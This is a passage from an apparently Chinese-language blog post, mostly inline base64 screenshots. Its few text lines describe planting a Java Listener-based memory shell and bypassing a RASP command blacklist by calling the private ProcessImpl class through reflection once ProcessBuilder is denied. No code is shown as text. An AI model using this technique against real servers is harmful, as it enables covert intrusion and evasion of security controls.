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
<p blockindex=35>使用Listener组件容错高</p>
<p blockindex=36><img src=data:image/png;base64,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
<p blockindex=37>执行,无报错并且返回 200说明成功了</p>
<p blockindex=38><img src=data:image/png;base64,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
<p blockindex=39>随便找个路径连接即可</p>
<h3 blockindex=40>RASP绕过</h3>
<p blockindex=41>在命令执行的时候可能会遇到:<strong>java.lang.SecurityException: cmd execute denied !!!</strong></p>
<p blockindex=42><img src=data:image/png;base64,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
<p blockindex=43>即存在RASP而RASP一般是通过黑名单进行过滤的</p>
<p blockindex=44>这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用</p>
<p blockindex=45><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABvYAAANfCAYAAAACXOowAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOy9edBlR3Un+Dt53/uW2ksLZrFUVVpYrbWEjQxowx6DEBLI/DERg4wWaBsbYvqf8T8mwnhimGn3xEx0h+mw3Vahshs6oqdBQoCxwwaEJAy0jaokIYMwVi0SRgIk1VfLt7+bZ/7IPHlO5r33fe9bSgj8ElTfu/fmcvLkWX4nM29eOv/VFzFAAAggwsTEFPoTE6jrGsvLyxgMBgAznCMwGGAGiLBSYhAo/QaICM5VqHo9VK4KzYHAWiD9lpIcSsYH6Sq0z5zqDjSFv/VgGfVgAMCHp94DXAPMIHgwM3w9gK9r9HsVtm/fjq1btoJA8Bz6R47AnCgDiDA3P4/JiQlUVZXaNqRHus01M5xz8T+Co8Bjjrkp/csZD7RNeVrc7+D2iyutjZ4wvoFHde0xGAzAnuEqh15V5bxPzM7HaXgDRV4enU5mBq1Q/0rPV2hgBa4laciLxXbZB3752KfJycnAotY+UlIr7xmnZmfx/LFjWFpeRlX14FyV6g65Y35mabCgee3jzewBa1I4aXnWTk7+Gvic5Ebt0ij1tXO9qNPUM7Sm9LCskVrv6hPTljE2tfcAe5Cj2DaVpYZRk6XShrXn5OK2tpcu0/B116hVUN7nlqxkeJNsfxt9ib0r9D0rT61jZm1/EkHv430Zh/Dbew9f15icnEh+LelFlGWxCxnLLHs4e